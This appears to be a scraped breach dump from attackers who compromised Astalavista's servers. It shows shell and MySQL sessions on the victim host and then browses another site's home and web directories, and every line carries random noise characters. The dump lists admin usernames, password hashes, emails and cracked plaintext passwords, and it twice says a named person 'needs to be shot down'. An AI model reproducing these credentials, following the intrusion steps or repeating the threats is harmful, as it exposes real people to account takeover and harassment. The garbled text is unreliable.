<docs>http://blogs.law.harvard.edu/tech/rss</docs>* ?! l' u4 q1 J0 Y( j
<generator>Astalavista.com</generator>1 \! j. [: L# i% P" E" A
<webMaster>info@astalavista.com</webMaster>’ . $items . ‘8 _# R+ Q% c% L: @5 { s
</channel>
/ ~1 ?6 r8 ?9 V: y3 z</rss>’;
5 }* d7 D6 j8 Y% c, s8 [
* ~1 }5 I* }" s& c( Y6 |' \ if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
' G& v# n2 o2 i5 d+ y' \6 { unlink (FULLPATH . ‘/feed/exploits.xml’);
4 F9 Z- U% D6 F# ] f }
3 {# h8 o- h, |! {1 d. u' h6 D
* Z" d# h6 v H6 I" u* ? file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);+ ]+ c5 \% E8 w/ m0 K
[snip]
& s% l5 m# @$ @8 k' U3 K; v& Y8 ?, J( ^
sh-3.2$ cat exploits.sh0 M( \! i7 h) V; ]: Z0 w
#!/bin/sh
1 C5 m% r# C6 |8 ]" N4 G3 Y" ?) O
###########################################################
+ T* O( u4 s6 l% W/ Z# #
- F% Y% w5 N# E ~$ ~( d# Title: milw0rm exploits adder #
7 E& b$ ^/ e: h# H" A. k! l# Description: Add all milw0rm exploits to the #% _+ d9 k0 K, t- v$ Z# q" B7 {
# Astalavista.com database #
8 a. x5 p* X# r4 K& R5 P+ X# #* x ~' [2 k3 _1 H0 E9 Z1 J
# Company: Astalavista Group #/ a& C8 x' I: K. a. C9 f
# Author: Paulo M. Santos #
* p, w$ e1 u9 N' P# i- l# E-Mail: 链接标记paulo.santos@astalavista.ch #
- W% V6 x8 x- i7 d: M! o( w& _% H) q# #) N0 k4 D8 ^1 ?5 r* R2 F6 g
###########################################################5 j2 t/ Z% d8 i" Z3 ?
2 K+ P; n9 b+ V. C1 v# path* V; Y, z! o+ K! y9 c
this_path=/home/com/public_html/modifications/cronjobs( N2 ^- m. e& Y. t" s
% M0 N7 g- S, J* y) o! H
# change directory1 d( @* X. r1 Y
cd $this_path% j* r U; | s
cd tmp/ O, H5 b- x u7 ^$ F8 u
! R2 l! F$ E6 P% V& t$ P7 C
# delete files6 ^$ i! t3 \- ]0 I9 o
rm -rf milw0rm.tar.* &2 k9 w) ]: [( y6 \
rm -rf milw0rm/ && U0 G# c6 P; H7 Z$ s8 W( d
" G0 [5 ~2 v1 v, }' O% ~! ]
# wget milw0rm paket8 b- `: ` w0 @+ I
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]2 A1 f9 V, i; e5 e8 m
. m/ j6 L& g6 n ~, I3 r2 X
# extract milw0rm paket
. O$ l" R* Q3 i4 r' ?, Ttar -xvf milw0rm.tar.bz2+ ^+ Y( o2 q; _3 B/ R3 P- y9 M( t
9 A- j* W8 C/ n4 z6 A
# change owner
0 e J( {1 z* q6 W0 V. [# h; L+ o. Cchown -R com .
0 r6 b* Q5 `% G5 r( b% e1 T, r* nchgrp -R com .7 Z5 L% c6 Z# b3 N
. I! V2 T6 D4 O* W
# execute php script- `0 ?' S9 n- \' j
cd $this_path/ z, h* M" o, T+ h
php -q exploits.php8 D2 ^1 E- Q/ _2 a0 {& M
1 Z& M9 W6 C6 t) E9 Y# delete files& Z) D2 K% `1 z9 O$ R: s* C5 S
rm -rf tmp/milw0rm.tar.*( Y( m9 S+ f8 ?$ s# w8 Q
rm -rf tmp/milw0rm/
9 e: F' _# L' s+ _! B& V/ x* o: e( Z
sh-3.2$ echo “Paulo M. Santos needs to be shot down.”' {9 N# K9 u r: @
Paulo M. Santos needs to be shot down.
1 H Q2 l6 c# O% X: ~6 q1 N$ H# A% `2 q6 E: R0 {
mysql -u contrexxuser2 -p
: u+ a; ?6 D/ X3 \, ^. Z2 y6 AEnter password:$ D% n# t- K5 C. z8 g; c
Welcome to the MySQL monitor. Commands end with ; or \g.
) F" b7 V( ?! \* k' FYour MySQL connection id is 261694
/ } s& _3 o" b6 @% C; L- K1 vServer version: 5.0.45-community-log MySQL Community Edition (GPL)
7 W3 z2 T W' E8 {5 K3 [7 l2 K% V. ?, X
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.8 V7 N9 P" r: K: z
$ u P* W2 z$ Y1 t) u4 smysql> show databases;
9 x5 W- B1 `7 T( M& W* p+——————–+
% k' z3 @6 y8 C( @& \7 |. F, B- R4 m) @| Database |2 I4 d8 B" M/ V: X& E
+——————–+! U. v3 i- g l: r+ ^
| information_schema |
1 P7 W& a1 @- h9 O| com_contrexx2 |% l% p2 a% P0 a1 m$ G
| com_contrexx2_live |
?6 o% Y8 c: u4 g1 J" T) Y| test |
+ c$ I/ q- C3 C6 q) V- f' e4 f+——————–+
3 o& w7 u$ P7 [2 K q {4 rows in set (0.00 sec)* T1 a: ` c& w5 @. O
! C& r+ r) H* H
mysql> use com_contrexx2_live
9 P* h" C# c* T y- ]/ _$ G1 yDatabase changed
- E9 d( y. Q5 s' K: [5 Y; Rmysql> show tables;
! \. k$ `6 J5 n5 q. _+————————————————–+
. w, A1 T. Y/ b7 Y| Tables_in_com_contrexx2_live |
- Q; t( z: M0 R; `' W+————————————————–+9 I, j/ q8 b/ N
| cc_banner_counter |
# b2 E5 Y' g& ~& W| cc_search_counter |" _) X: x8 _/ L5 H0 B/ J
| contrexx_access_group_dynamic_ids |, P+ }: b7 h- Z! ]6 F$ g
| contrexx_access_group_static_ids |
% @# ]# K' q7 z3 u U1 ~+ c| contrexx_access_rel_user_group |
/ H! }5 o3 V( I3 e| contrexx_access_settings |
: [2 |* u1 i2 t8 W# u" C4 h| contrexx_access_user_attribute |4 {2 ]( x7 }) t7 R# R; ~
| contrexx_access_user_attribute_name |
7 }9 v+ Y7 n; P' z| contrexx_access_user_attribute_value |
4 n# u7 A/ ]4 [# [| contrexx_access_user_core_attribute |
4 A7 J2 {# m" _0 ~& h. O| contrexx_access_user_groups |! l0 R+ ?8 `' F9 L1 z* _
| contrexx_access_user_mail |
) A f1 b; g, m3 ]| contrexx_access_user_profile |
8 y1 L* O& y0 b0 G! ^; W| contrexx_access_user_title |6 A; N, z5 c& w1 B
| contrexx_access_user_validity |# O3 Y( W) K- C. K: U
| contrexx_access_users |
% D- h* N9 M; Q+ {| contrexx_backend_areas |: O( t' w! q- M; e
| contrexx_backups |
. H( B. e6 m7 k6 \| contrexx_content |
: |- M) B" S2 X9 ~, k1 d| contrexx_content_history |
* P- r4 M) v( G, r% v9 H$ j| contrexx_content_logfile |
; I3 u0 X1 G9 k+ X8 t0 V| contrexx_content_navigation |
/ s( D m, w; }+ F( s& @7 z! U| contrexx_content_navigation_history |
. f T t4 Q8 ~: y| contrexx_ids |
0 e0 U8 G8 L9 n$ m1 n8 Q| contrexx_languages |
3 s5 E5 z) N( g* g; V n| contrexx_lib_country |
) a! e. m; s- D8 z' X| contrexx_log |
( c. A" i. V$ q3 T9 N| contrexx_module_alias_source |
1 i) f" E- `; K$ W) ]/ i$ Z! s| contrexx_module_alias_target |
, R u: |1 {0 A i2 G9 Z| contrexx_module_block_blocks |: g/ a3 X; h# Q$ ^9 j3 H1 _
| contrexx_module_block_rel_lang |
, I3 P9 R# V% ^! g6 `# [| contrexx_module_block_rel_pages |
, B& r6 c h+ u: z& h H| contrexx_module_block_settings |
/ b1 a& {# R6 @7 u5 C| contrexx_module_blog_categories |
) N2 b( Y8 `' \4 H, n- S% N1 w) Y| contrexx_module_blog_comments |/ O; B: `6 O; u, u( Q8 t O
| contrexx_module_blog_message_to_category |
- V/ G$ l* a# @0 Z% b$ s: |. b| contrexx_module_blog_messages |& }) e- A; o- |# _ A
| contrexx_module_blog_messages_lang |
# r; i5 K* |4 D! u& X' Y| contrexx_module_blog_networks |' o5 R U# t; g8 Y8 ]8 |/ |
| contrexx_module_blog_networks_lang |
( \& G% x6 {. \. Q| contrexx_module_blog_settings |+ }! I& C6 Y4 N# O+ Y2 c- P% W
| contrexx_module_blog_votes |
% |- A7 W7 i. K- z( ~| contrexx_module_calendar |" D" H4 t: `+ s7 W( R+ z6 v- i0 D( o
| contrexx_module_calendar_access |, X5 {; f& k+ S
| contrexx_module_calendar_categories |5 U) u$ E: m0 g$ O4 P; C# h
| contrexx_module_calendar_form_data |
2 [0 g% \# j7 N| contrexx_module_calendar_form_fields |# W7 }% N; J' u8 r( `
| contrexx_module_calendar_registrations |
) G6 A" j d: a) I3 T& V3 b| contrexx_module_calendar_settings |& |3 j# d5 A- K4 z! H' O
| contrexx_module_calendar_style |
* l) d# q/ p# d Y6 H| contrexx_module_contact_form |
1 V" `0 D; w# b# m6 U| contrexx_module_contact_form_data |% L8 S+ R/ y' q& r* ~$ k0 A
| contrexx_module_contact_form_field |. n+ S% e0 _5 X
| contrexx_module_contact_settings |
+ N4 n/ Q* ?0 }+ w7 ~| contrexx_module_data_categories |0 z6 t! K* _9 [, B0 l
| contrexx_module_data_message_to_category |
/ W( D0 d) V8 l& O. E- i- [| contrexx_module_data_messages |
1 b6 k7 C: x% k+ F2 F| contrexx_module_data_messages_lang |
3 w) n B6 B, I" s9 f) t& z| contrexx_module_data_placeholders |3 ]3 h$ l% l2 P
| contrexx_module_data_settings |% U9 ]# o( m7 W& U; o$ z
| contrexx_module_directory_access |& \( V0 {/ {: u3 M V
| contrexx_module_directory_categories |) O' s3 _* o& j* V" u
| contrexx_module_directory_dir |! _' M$ S. h* ?# r5 p
| contrexx_module_directory_inputfields |$ K6 r$ r1 K. C+ c4 u
| contrexx_module_directory_levels | \5 H i1 h6 f5 \
| contrexx_module_directory_mail |$ o7 ]" P& s; Y7 q, m
| contrexx_module_directory_rel_dir_cat |, I" e# N+ m# a0 A; V4 v
| contrexx_module_directory_rel_dir_level |
1 o& k) t/ \+ q1 n" a| contrexx_module_directory_settings |
5 J( e$ K) J9 }! |' C. a| contrexx_module_directory_settings_google |
8 d1 Q( E# @% ~) z# f| contrexx_module_directory_vote |6 z2 n' z. j! E0 c/ {& S r) R# C7 o
| contrexx_module_docsys |" D4 j. b6 x, U0 {
| contrexx_module_docsys_categories |
% e& c3 y8 M& V e# W2 P: ~! H| contrexx_module_egov_configuration |- @2 }7 t' K3 M8 }' w# d
| contrexx_module_egov_orders |; E; }, m( q) z! C+ O# O; G) O5 G. q* v
| contrexx_module_egov_product_calendar |8 v( m2 D4 S. E% O3 L8 S2 ?: K
| contrexx_module_egov_product_fields |
. t* d$ v" w! U5 `" c8 w _# || contrexx_module_egov_products |
0 s" f* U. v; S| contrexx_module_egov_settings |
, S% }4 v" _+ A' k: h! J| contrexx_module_exploits |" K' a" V! w* K# U; U5 ?
| contrexx_module_exploits_categories |: R: q' p6 g/ {. L
| contrexx_module_feed_category |
- J3 L* P: D$ |* b| contrexx_module_feed_news |3 u+ i+ W8 d3 _' R9 I( x' ^
| contrexx_module_feed_newsml_association |; }6 U& I" o$ u" c7 W! l8 L: ^% f! f
| contrexx_module_feed_newsml_categories |
7 t3 q# h) B, T& Q- T5 B| contrexx_module_feed_newsml_documents |
3 s; T7 o( F/ X& Z& U| contrexx_module_feed_newsml_providers |: _: G8 V+ y9 Y q: p( K# e* L+ U
| contrexx_module_forum_access | H4 F8 C X( O I$ T! O3 |
| contrexx_module_forum_categories |
. ~0 C: V Z5 o4 o, }" x6 C1 P| contrexx_module_forum_categories_lang |0 @2 n$ p5 p7 d/ ]
| contrexx_module_forum_notification |
- F4 G$ h$ l3 e k7 H5 D| contrexx_module_forum_postings |, E" E3 b! ~# q B* _: e
| contrexx_module_forum_rating |
' r" T4 h/ n$ p3 M! w| contrexx_module_forum_settings |6 w3 o9 z$ N/ l+ ^' g7 d; F
| contrexx_module_forum_statistics |
3 l5 s7 y9 M/ e7 s. w+ x| contrexx_module_gallery_categories |
+ r/ D/ c2 |) M- ?# g/ y5 u: d| contrexx_module_gallery_comments |
! c1 m* j- l& a) x; }| contrexx_module_gallery_language |; M7 H! P6 @6 r" e
| contrexx_module_gallery_language_pics |. E' d) B% Q3 H( b4 m8 k+ m
| contrexx_module_gallery_pictures |
# T1 L3 n, }+ {| contrexx_module_gallery_settings |
8 Y+ n. X2 Y% E0 f! t| contrexx_module_gallery_votes |
4 C+ j" |( w& P O- x/ k8 M| contrexx_module_guestbook |- Q' f+ D2 e2 R- r! ?
| contrexx_module_guestbook_settings |
( H2 W) c6 U- t2 c2 J& B+ v| contrexx_module_livecam |! [* t) L0 y4 Z& N2 c. M
| contrexx_module_livecam_settings |$ E8 P) p( x+ R" U2 E( j4 U' |
| contrexx_module_market |& m! C! M7 J5 t5 [
| contrexx_module_market_access |
: B( p& P6 h3 L/ R% h| contrexx_module_market_categories |) |- \( E2 Y* \, @
| contrexx_module_market_mail |+ O! z( Q' T6 P$ J: t5 g
| contrexx_module_market_paypal |
) l) u, x$ K. |' i$ y* F0 ?| contrexx_module_market_settings |4 h3 G4 w/ ]% h. F
| contrexx_module_market_spez_fields |
9 z5 [9 m3 X9 d) }2 a| contrexx_module_mediadir_access |- s7 b; a5 a! j' N0 _2 _6 q( p, m
| contrexx_module_mediadir_categories |
( q' J! v4 H7 S) h. o| contrexx_module_mediadir_comments |5 ~: U. x5 d" ~6 d1 j
| contrexx_module_mediadir_dir |( z% M, I# j: U. G, Q
| contrexx_module_mediadir_inputfields |
( J( B0 J* M8 Y* a4 @) N| contrexx_module_mediadir_levels |
2 [5 f: T4 g1 i) Y) C4 j) p: t S! z| contrexx_module_mediadir_mail |
5 ]7 _4 k. L, e" y0 Q| contrexx_module_mediadir_rel_dir_cat |# [) G2 h5 z" g
| contrexx_module_mediadir_rel_dir_level |2 e \' _* z4 X% T9 `
| contrexx_module_mediadir_reports |
4 @& ]& j2 l1 k2 Z# Q# n| contrexx_module_mediadir_settings |7 F5 d; L: ^" k5 k1 _& d
| contrexx_module_mediadir_settings_google |+ f- Z# Z' l5 p2 p
| contrexx_module_mediadir_vote |5 s% ~$ U* ~" _# F/ j n
| contrexx_module_memberdir_directories |1 k; _; S) j+ @ ]1 s
| contrexx_module_memberdir_name |
, p$ R/ q# C: ^/ i" [| contrexx_module_memberdir_settings |
9 x/ X# {( l+ A( Q/ T: w| contrexx_module_memberdir_values |4 S! w) R- `- c: n! T' \" m
| contrexx_module_nettools_allowed_groups |
. M- f' {7 q' a0 [# e5 T' r| contrexx_module_nettools_settings |# r! M' b E" O4 `& p. y
| contrexx_module_news |- y. m g, u4 B: X+ [
| contrexx_module_news_access |$ p+ w @: K3 a% R2 K" ?
| contrexx_module_news_categories |
2 Z+ u/ p1 R% u* }* P| contrexx_module_news_settings |# I2 p, j( i* M' V* m) N, C
| contrexx_module_news_teaser_frame |4 ^0 h& D6 y6 q
| contrexx_module_news_teaser_frame_templates |
* c7 F" o8 d" d2 }# ]! b5 q| contrexx_module_news_ticker |
1 g, M& z$ B' j2 M| contrexx_module_newsletter |9 W7 E3 ^3 b5 f& o ~. l
| contrexx_module_newsletter_attachment |
' e! o0 R. C. ?3 N4 d) U' Z8 A| contrexx_module_newsletter_category |" b! _& `+ |2 x q7 o, f/ q' O, d4 J
| contrexx_module_newsletter_confirm_mail |
. B7 K1 ?; I, T* z- k k| contrexx_module_newsletter_rel_cat_news |6 O$ Y3 ^! \+ q2 d2 L* Q; l
| contrexx_module_newsletter_rel_user_cat |- q; {5 i F3 f/ w4 k- {' Q5 n6 t
| contrexx_module_newsletter_settings |
2 N: u2 Y6 N9 W: i7 W| contrexx_module_newsletter_template |
7 {) q% T3 [$ E6 c! \& y| contrexx_module_newsletter_tmp_sending |
+ H0 g- z8 Y" p8 D% H3 c9 i/ U& Y| contrexx_module_newsletter_user |/ ?/ Y$ R9 t3 C8 ^: Q
| contrexx_module_newsletter_user_title |
7 [3 ], `! W( A$ A+ O3 Z4 Q) j| contrexx_module_onlinetools_defaultports |
1 Y; O$ S8 ?# E9 x( ?| contrexx_module_onlinetools_defaultports_back |; i6 j' c& z- u* t8 B
| contrexx_module_onlinetools_geolitecity_blocks |9 x" ?6 t% Q- ~" t( h
| contrexx_module_onlinetools_geolitecity_country |
2 s; N. B9 Y: f% B| contrexx_module_onlinetools_geolitecity_location |3 z& {; I0 U7 | }! M: c
| contrexx_module_podcast_category |. {, A- w ?! p, N. e0 L6 e+ F
| contrexx_module_podcast_medium |
& z4 j* ^6 C: t1 u1 F, h4 K0 Z| contrexx_module_podcast_rel_category_lang |
+ S' X1 _) `0 g: ^ B| contrexx_module_podcast_rel_medium_category |
4 v- @% ]! u1 G- s' W| contrexx_module_podcast_settings |) _& Q8 { |0 F; ]8 p
| contrexx_module_podcast_template |
, W' t; R' {' H0 ]* p| contrexx_module_proxydb |
4 s7 ^5 U; g" g6 [3 a6 B5 S| contrexx_module_recommend |6 m6 }( `) r4 D* _+ W
| contrexx_module_repository |$ ]2 E& M9 X/ N( J9 B- r* P
| contrexx_module_securitynews_cats |
% N" e( `; B4 ~: X. E| contrexx_module_securitynews_feeds | n$ F1 x$ b- p" D6 g+ w" j
| contrexx_module_securitynews_news |
5 J, j. i! b/ n4 [& W* w+ X4 p| contrexx_module_shop_categories | x( E6 d0 e0 |1 ^
| contrexx_module_shop_config |, L. @8 [% D' U7 N0 K
| contrexx_module_shop_countries |& h \' ~% }. Q7 x) ?8 f1 W) k3 j
| contrexx_module_shop_currencies |: k9 a t [6 X
| contrexx_module_shop_customers |8 {$ j0 E) L( i1 q( J. e
| contrexx_module_shop_importimg |2 q3 ]3 K4 N: @5 y
| contrexx_module_shop_lsv |5 N& w" c# b" h; p; K
| contrexx_module_shop_mail |# r- S& K R f: z6 i. b
| contrexx_module_shop_mail_content |2 L" @) S/ D+ O4 P7 K& ^; s
| contrexx_module_shop_manufacturer |% ^) h- j$ Q7 c+ w, Y
| contrexx_module_shop_order_items |
$ B0 T# S9 E& P. N, l| contrexx_module_shop_order_items_attributes |
* d1 t2 O8 T0 F4 X; |! t5 a+ s5 j8 P# u' F| contrexx_module_shop_orders |% I: W) y$ {5 `3 c. v% M
| contrexx_module_shop_payment |; S- }5 Y3 n! }4 J$ e; R# R
| contrexx_module_shop_payment_processors |
& F# v) W$ h3 F2 A$ i; D5 W| contrexx_module_shop_pricelists |
! K: k+ v/ \# ?| contrexx_module_shop_products |
1 P- U5 p6 M3 Q' `( X| contrexx_module_shop_products_attributes |
: j, k8 [& J) y! c" v7 z| contrexx_module_shop_products_attributes_name |
" c- N0 U0 k- f$ P+ [$ }| contrexx_module_shop_products_attributes_value |
; N6 ^1 D- s% O' S9 V6 O; p| contrexx_module_shop_products_downloads |
3 p. a7 T$ x2 {3 s2 g| contrexx_module_shop_rel_countries |
) ?& e1 j& {5 s e2 N| contrexx_module_shop_rel_payment |9 R# Q D+ _2 E) p. i0 O) V
| contrexx_module_shop_rel_shipment |: R, y. W9 E& ]
| contrexx_module_shop_shipment_cost |+ m) o. } }' m8 K0 Z
| contrexx_module_shop_shipper |& \, m3 m6 J6 |7 {" p5 h
| contrexx_module_shop_vat |
! `, S* N1 p3 D: _| contrexx_module_shop_zones |% f. m9 u$ @. g1 n
| contrexx_module_u2u_address_list |
, t0 N2 ?/ f5 ^. b! _| contrexx_module_u2u_message_log |
" ^ A5 G I8 T- a| contrexx_module_u2u_sent_messages |
, k3 V+ U: ~- \1 W6 z$ Q| contrexx_module_u2u_settings |
& j! Q- m: b( B7 o$ I: q& Z| contrexx_module_u2u_user_log | x4 h6 R. y7 }# _$ {' o8 h' k
| contrexx_modules |5 }# w( H0 D& K
| contrexx_sessions |0 j$ e& T+ c6 u, K5 E! x4 {2 Y
| contrexx_settings |
5 V* a/ j: N K, Z! [* z| contrexx_settings_smtp |
2 C2 t) x2 V E. }: @+ Q; C| contrexx_skins |( g# [% q0 P$ s. W0 J0 l+ k
| contrexx_stats_browser |' A$ Z7 p4 X- g
| contrexx_stats_colourdepth |
$ r. n* s9 G3 ?& m j/ ^| contrexx_stats_config |
7 k) E% r! N# C8 A| contrexx_stats_country |6 A+ _: R% O n k
| contrexx_stats_hostname |
6 i( d+ a! B8 u. T$ s| contrexx_stats_javascript |
x E+ `& s1 B& Q, Q1 R| contrexx_stats_operatingsystem |
/ p: N! z V4 W; M* o| contrexx_stats_referer |0 @: a1 W3 I" E `( G$ z
| contrexx_stats_requests |
}; c+ ? |! |. B/ w4 e% S9 A| contrexx_stats_requests_summary |
9 G. M) G/ w5 J9 ^& y6 g| contrexx_stats_screenresolution |- c/ t: Y) j( A0 V. W* o
| contrexx_stats_search |8 C. M ^% D4 t
| contrexx_stats_spiders |
) o; a) g0 x: N' `3 \4 T| contrexx_stats_spiders_summary |
, v) \! f+ w' O1 E/ d0 Y9 R| contrexx_stats_visitors |
9 m3 e' R. P7 R- B/ E+ s| contrexx_stats_visitors_summary |! h: j$ q7 x+ |: g- Z, H
| contrexx_voting_additionaldata | }! [: w9 Q2 ?* z
| contrexx_voting_email |2 W" O- Q Y' x, k
| contrexx_voting_rel_email_system |5 h' `# }4 E: N, J! a6 i
| contrexx_voting_results |) \% ~3 B5 H/ Y6 t
| contrexx_voting_system |. F7 ]1 a, T0 S! |/ j
| foo |2 Q& | ?! F0 W9 W" c
+————————————————–+
, i, f: M1 e9 Y1 k+ u7 ]. [0 y227 rows in set (0.01 sec)+ X& q$ f' t$ }! K# H
7 Z4 K3 G8 @5 Q! d; ^+ d) K- vmysql> select count(*) as skids from contrexx_access_users;9 D2 w2 x5 g$ z+ R# G/ y, p) O
+——-+
6 j( y' G, ?8 C l) N" u2 r& P| skids |
) y4 U* a! M0 s4 Y+——-+0 K; k }( W" l, f5 N1 K) o
| 53699 |7 _# c# p4 y5 | w1 d
+——-+; Q8 Q* Q) \% l& M( u- r
1 row in set (0.00 sec) ], J4 \2 X; ]# v9 D8 s' T
. O* Y& d) {6 R7 }, Y5 Wmysql> describe contrexx_access_users; Y" D4 c8 r* w% v; a P
+——————+——————————————+——+—–+————–+—————-+
- q% t" M4 L" p. X| Field | Type | Null | Key | Default | Extra |
9 H+ L) Y4 D W2 W- P+ H, L' C2 [+——————+——————————————+——+—–+————–+—————-+* J1 S2 T- L: V% Y4 z
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
$ {9 f* V. L ?5 I" `/ ?4 V) [' c| is_admin | tinyint(1) unsigned | NO | | 0 | |
- ?7 ?/ L T% f) d7 q4 t- V6 s6 o| username | varchar(40) | YES | MUL | NULL | |
* _; I& q6 \+ p7 A| password | varchar(32) | YES | | NULL | |
4 ?" n( L! \( W6 C9 Q| regdate | int(14) unsigned | NO | | 0 | |: ]/ x& C T6 {7 L/ e
| expiration | int(14) unsigned | NO | | 0 | |* u3 N( @- r5 W# b: N
| validity | int(10) unsigned | NO | | 0 | |# H" b' a$ a/ V( `* ~. ?$ v+ Y) N
| last_auth | int(14) unsigned | NO | | 0 | |# B2 U6 c/ c- l7 b: P
| last_activity | int(14) unsigned | NO | | 0 | |8 i. q+ b$ f9 r) W( K" P/ x6 P! P
| email | varchar(255) | YES | | NULL | |
: y/ v3 b7 ?& [. e) u& g| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |' ?4 x* o3 b- x+ r$ G
| frontend_lang_id | int(2) unsigned | NO | | 0 | |& s( h1 o# a5 z& B( D. y1 C
| backend_lang_id | int(2) unsigned | NO | | 0 | |
- j( l& T, ?2 |, t) d- v% }. E j8 `| active | tinyint(1) | NO | | 0 | |
/ B) `* H2 R0 P; O/ `/ R4 N. ^6 i| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |
+ |9 T: B, ~- N! K( m| restore_key | varchar(32) | NO | | | |
3 k1 ?- c8 D4 B6 e' u| restore_key_time | int(14) unsigned | NO | | 0 | |! k, d* U; G# t1 K a3 }% b. i
| u2u_active | enum(’0′,’1′) | NO | | 1 | |; _9 @$ g# L4 e" L* d
+——————+——————————————+——+—–+————–+—————-+$ c! h: i0 {, m% {6 z8 `
18 rows in set (0.00 sec)% j h. T$ V8 I& ]
" B" K* _1 {3 U5 m
mysql> select username,password,email from contrexx_access_users where is_admin = 1;* T$ L4 r' x# r3 H
+————+———————————-+—————————–+: T6 D- E$ x2 R
| username | password | email |
" Q/ w8 f3 R! r4 V% p/ u9 o! J& ^+————+———————————-+—————————–+
$ c0 W1 C% v5 e: |( V| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |
; m" t' d; t4 i4 x# J6 C( B* Y| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |
, F+ @ v" F! q. H| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |7 s: P: Q' W- I% M
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |. L) |% z( X$ v2 s
+————+———————————-+—————————–+
, r8 \7 }9 u$ G* V& T4 rows in set (0.04 sec)- q% J( I* o# p# h
. a4 L4 M4 V, E! \6 o( Wmysql> exit;3 m0 b$ R$ `% i' G5 |! T: J
Bye
! ^4 @) E% d U9 z/ C+ N+ B, ?, O( p$ N
[~] There you go, your “team of security and IT professionals” is a joke.
6 l! N9 n# D- | H
, F2 j4 f: x" H* }/ ?+——————————+ ~/ l9 H% ^' L
system:f82BN3+_*, w. e" ?+ P. h, ]& [* G4 Y
Be1er0ph0r:belerophor4astacom
9 h/ R3 i" S, v* \/ d$ Qprozac:asta4cms!5 g4 @+ K" `+ h2 @" h9 ^
commander:mpbdaagf6m! D( q# r3 H* {2 X4 r/ \
sykadul:ak29eral
& D k* I4 R) v7 C9 x6 K: ^* r+——————————+
3 m/ h7 p% m6 d" O
$ x7 ?5 R( \+ p2 z, c[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
2 n& {5 |6 y8 X3 ]- N& d…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.
/ h7 N s, E7 F! ~2 |8 e8 m, n: K. V7 x( A( Z" n' y2 |
[~] Lets move to astalavista.net now,- J; g6 ^# j9 H. v+ e" g
+ ?4 t. u$ y# T) j
From <链接标记[url]https://www.astalavista.net/[/url]>:
: A" V. a# v3 B* N* s>> Everyone knows that the best defense is a good offense.
9 ~& t' C- V" p7 l4 ]' p5 k; P% j! {>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
5 w, v# K0 t P, [>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
/ L7 p; d4 { J, F! b" s9 K: U>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”# ]# A& u7 S. _/ C6 n4 M/ c9 J
; J+ n% I& C9 \! E8 ]9 n>> Go ahead, try and hack our server . in a completely legal way!3 R8 E& |1 o3 D9 F& j# W4 J6 i
>> Learn by doing: We offer our members tricky tasks and challenges on an' f8 Z# U/ ?! j
>> ongoing basis so you can test your knowledge and abilities. You can also
3 Q& N& s* s8 E' w: G- Q! Z7 `' o$ V1 {>> demonstrate what you.ve mastered by taking part in regular hacker contests/ @+ q; j% v1 q+ s* @" K9 r2 [
>> and war games
; |" \0 o( m7 ^
; c1 H) |) v( [[~] Lets take a look there, after all… they are hack-proof, aren’t they?!' a# b' F1 t' E. z8 Y
/ D- O, R" g$ I[-] Tricky task: Find home dir of astalavista.net3 P/ X. l8 I+ ^! e" A" J, y
) s$ s: `1 G& P; I" l) ]sh-3.2$ ls -la ~astanet
- ]. ]0 P S! ~. \# \total 485 G; U* r! Q. A0 r3 S) c
drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .
' w, H/ ^& {1 ^/ a5 Jdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
- [ D; V7 d+ j, [( Ldrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth- z: d# r; @9 N/ s& A4 _' C5 ]
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history. w- q. b- s: a& p. l: d
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout- \, k2 W# ^& t2 q: M
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile6 d. C4 _" u; q" E
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc' ~+ A) Q3 q# U6 Y h; A: J
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains, M( a8 x0 k; M! U, i
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
6 v( E Y$ D) K) {! E; f1 Ddrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
7 C {2 T ~/ H3 Slrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html0 |" H, |" J) V; L, w
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
, d# P0 h& \1 y" h" N
4 X6 i2 L& Q, Ysh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/, Q: A2 j/ C- V% U% F
sh-3.2$ ls -la8 M2 H* G1 V9 p2 E ?' z7 k
total 200" `$ A/ y4 O1 w$ D
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
1 S- q+ c( e/ O' h0 fdrwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..
* ~. t% `# s: R0 ^, Udrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
/ d ]2 v: p! U/ \) W: Y1 a2 zdrwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql5 I4 G/ w5 i* l6 V
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com. z9 F6 B- c8 o! M$ v( }
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend# q' h" y( V" j2 ^
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner0 h, N0 Q( t+ E) E* c- K1 ]
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
